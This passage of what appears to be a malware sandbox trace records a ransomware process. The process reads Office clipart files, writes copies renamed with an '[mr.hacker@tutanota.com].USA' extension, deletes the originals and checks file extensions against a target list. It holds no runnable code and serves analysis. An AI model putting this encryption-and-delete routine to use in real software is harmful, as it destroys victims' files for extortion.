lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.669] SetEndOfFile (hFile=0x204) returned 1 [0052.669] CloseHandle (hObject=0x204) returned 1 [0052.669] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.669] SetEndOfFile (hFile=0x1a0) returned 1 [0052.670] CloseHandle (hObject=0x1a0) returned 1 [0052.670] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0052.670] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif")) returned 1 [0052.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.671] lstrlenW (lpString=".doc") returned 4 [0052.671] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.671] lstrlenW (lpString=".docx") returned 5 [0052.671] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.671] lstrlenW (lpString=".pdf") returned 4 [0052.671] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.671] lstrlenW (lpString=".xls") returned 4 [0052.671] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.671] lstrlenW (lpString=".xlsx") returned 5 [0052.671] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.671] lstrlenW (lpString=".ppt") returned 4 [0052.671] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.671] lstrlenW (lpString=".zip") returned 4 [0052.671] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.671] lstrlenW (lpString=".rar") returned 4 [0052.671] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.671] lstrlenW (lpString=".bz2") returned 4 [0052.671] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.671] lstrlenW (lpString=".7z") returned 3 [0052.671] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.671] lstrlenW (lpString=".dbf") returned 4 [0052.671] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.671] lstrlenW (lpString=".1cd") returned 4 [0052.671] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.671] lstrlenW (lpString=".jpg") returned 4 [0052.671] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.672] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=14873) returned 1 [0052.672] CloseHandle (hObject=0x1a0) returned 1 [0052.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif")) returned 0x20 [0052.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0052.673] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.673] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.673] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.673] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0052.674] GetLastError () returned 0x0 [0052.674] ReadFile (in: hFile=0x1a0, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x3a19, lpOverlapped=0x0) returned 1 [0052.675] WriteFile (in: hFile=0x204, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x3a20, lpOverlapped=0x0) returned 1 [0052.676] ReadFile (in: hFile=0x1a0, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0052.676] WriteFile (in: hFile=0x204, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.676] SetEndOfFile (hFile=0x204) returned 1 [0052.677] CloseHandle (hObject=0x204) returned 1 [0052.677] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.677] SetEndOfFile (hFile=0x1a0) returned 1 [0052.677] CloseHandle (hObject=0x1a0) returned 1 [0052.678] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0052.678] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif")) returned 1 [0052.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.678] lstrlenW (lpString=".doc") returned 4 [0052.678] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.678] lstrlenW (lpString=".docx") returned 5 [0052.678] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.678] lstrlenW (lpString=".pdf") returned 4 [0052.678] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.678] lstrlenW (lpString=".xls") returned 4 [0052.678] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.678] lstrlenW (lpString=".xlsx") returned 5 [0052.678] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.678] lstrlenW (lpString=".ppt") returned 4 [0052.678] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.678] lstrlenW (lpString=".zip") returned 4 [0052.678] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.678] lstrlenW (lpString=".rar") returned 4 [0052.679] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.679] lstrlenW (lpString=".bz2") returned 4 [0052.679] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.679] lstrlenW (lpString=".7z") returned 3 [0052.679] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.679] lstrlenW (lpString=".dbf") returned 4 [0052.679] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.679] lstrlenW (lpString=".1cd") returned 4 [0052.679] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.679] lstrlenW (lpString=".jpg") returned 4 [0052.679] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.679] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=6684) returned 1 [0052.679] CloseHandle (hObject=0x1a0) returned 1 [0052.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif")) returned 0x20 [0052.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0052.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.680] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.680] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0052.680] GetLastError () returned 0x0 [0052.680] ReadFile (in: hFile=0x1a0, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x1a1c, lpOverlapped=0x0) returned 1 [0052.682] WriteFile (in: hFile=0x204, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x1a20, lpOverlapped=0x0) returned 1 [0052.683] ReadFile (in: hFile=0x1a0, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0052.683] WriteFile (in: hFile=0x204, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.683] SetEndOfFile (hFile=0x204) returned 1 [0052.683] CloseHandle (hObject=0x204) returned 1 [0052.683] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.683] SetEndOfFile (hFile=0x1a0) returned 1 [0052.684] CloseHandle (hObject=0x1a0) returned 1 [0052.684] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0052.684] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif")) returned 1 [0052.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0052.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0052.685] lstrlenW (lpString=".doc") returned 4 [0052.685] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.685] lstrlenW (lpString=".docx") returned 5 [0052.685] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.685] lstrlenW (lpString=".pdf") returned 4 [0052.685] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.685] lstrlenW (lpString=".xls") returned 4 [0052.685] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.685] lstrlenW (lpString=".xlsx") returned 5 [0052.685] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.685] lstrlenW (lpString=".ppt") returned 4 [0052.685] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0052.685] lstrlenW (lpString=".zip") returned 4 [0052.685] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.685] lstrlenW (lpString=".rar") returned 4 [0052.685] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.685] lstrlenW (lpString=".bz2") returned 4 [0052.685] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.685] lstrlenW (lpString=".7z") returned 3 [0052.685] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0052.685] lstrlenW (lpString=".dbf") returned 4 [0052.685] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0052.685] lstrlenW (lpString=".1cd") returned 4 [0052.685] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0052.685] lstrlenW (lpString=".jpg") returned 4 [0052.685] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.300] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.300] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.300] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0053.301] GetLastError () returned 0x0 [0053.301] ReadFile (in: hFile=0x220, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0xcb3, lpOverlapped=0x0) returned 1 [0053.367] WriteFile (in: hFile=0x204, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xcc0, lpOverlapped=0x0) returned 1 [0053.368] ReadFile (in: hFile=0x220, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.368] WriteFile (in: hFile=0x204, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.368] SetEndOfFile (hFile=0x204) returned 1 [0053.368] CloseHandle (hObject=0x204) returned 1 [0053.368] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.368] SetEndOfFile (hFile=0x220) returned 1 [0053.369] CloseHandle (hObject=0x220) returned 1 [0053.369] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.369] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif")) returned 1 [0053.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.370] lstrlenW (lpString=".doc") returned 4 [0053.370] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.370] lstrlenW (lpString=".docx") returned 5 [0053.370] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.370] lstrlenW (lpString=".pdf") returned 4 [0053.370] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.370] lstrlenW (lpString=".xls") returned 4 [0053.370] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.370] lstrlenW (lpString=".xlsx") returned 5 [0053.370] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.370] lstrlenW (lpString=".ppt") returned 4 [0053.370] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.370] lstrlenW (lpString=".zip") returned 4 [0053.370] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.370] lstrlenW (lpString=".rar") returned 4 [0053.370] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.370] lstrlenW (lpString=".bz2") returned 4 [0053.370] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.370] lstrlenW (lpString=".7z") returned 3 [0053.370] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.370] lstrlenW (lpString=".dbf") returned 4 [0053.370] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.370] lstrlenW (lpString=".1cd") returned 4 [0053.370] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0053.370] lstrlenW (lpString=".jpg") returned 4 [0053.371] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.371] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1146) returned 1 [0053.371] CloseHandle (hObject=0x220) returned 1 [0053.371] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif")) returned 0x20 [0053.371] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.371] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.371] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0053.372] GetLastError () returned 0x0 [0053.372] ReadFile (in: hFile=0x220, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x47a, lpOverlapped=0x0) returned 1 [0053.384] WriteFile (in: hFile=0x204, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x480, lpOverlapped=0x0) returned 1 [0053.384] ReadFile (in: hFile=0x220, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.384] WriteFile (in: hFile=0x204, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.385] SetEndOfFile (hFile=0x204) returned 1 [0053.385] CloseHandle (hObject=0x204) returned 1 [0053.385] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.385] SetEndOfFile (hFile=0x220) returned 1 [0053.386] CloseHandle (hObject=0x220) returned 1 [0053.386] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.386] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif")) returned 1 [0053.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0053.418] lstrlenW (lpString=".doc") returned 4 [0053.418] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.418] lstrlenW (lpString=".docx") returned 5 [0053.418] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.418] lstrlenW (lpString=".pdf") returned 4 [0053.418] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.418] lstrlenW (lpString=".xls") returned 4 [0053.418] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.418] lstrlenW (lpString=".xlsx") returned 5 [0053.418] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.418] lstrlenW (lpString=".ppt") returned 4 [0053.418] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0053.418] lstrlenW (lpString=".zip") returned 4 [0053.418] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.418] lstrlenW (lpString=".rar") returned 4 [0053.418] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.418] lstrlenW (lpString=".bz2") returned 4 [0053.418] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.418] lstrlenW (lpString=".7z") returned 3 [0053.418] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0053.418] lstrlenW (lpString=".dbf") returned 4 [0053.418] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0053.418] lstrlenW (lpString=".1cd") returned 4 [0053.418] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0053.418] lstrlenW (lpString=".jpg") returned 4 [0053.419] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.419] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.419] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0053.419] GetLastError () returned 0x0 [0053.419] ReadFile (in: hFile=0x200, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, 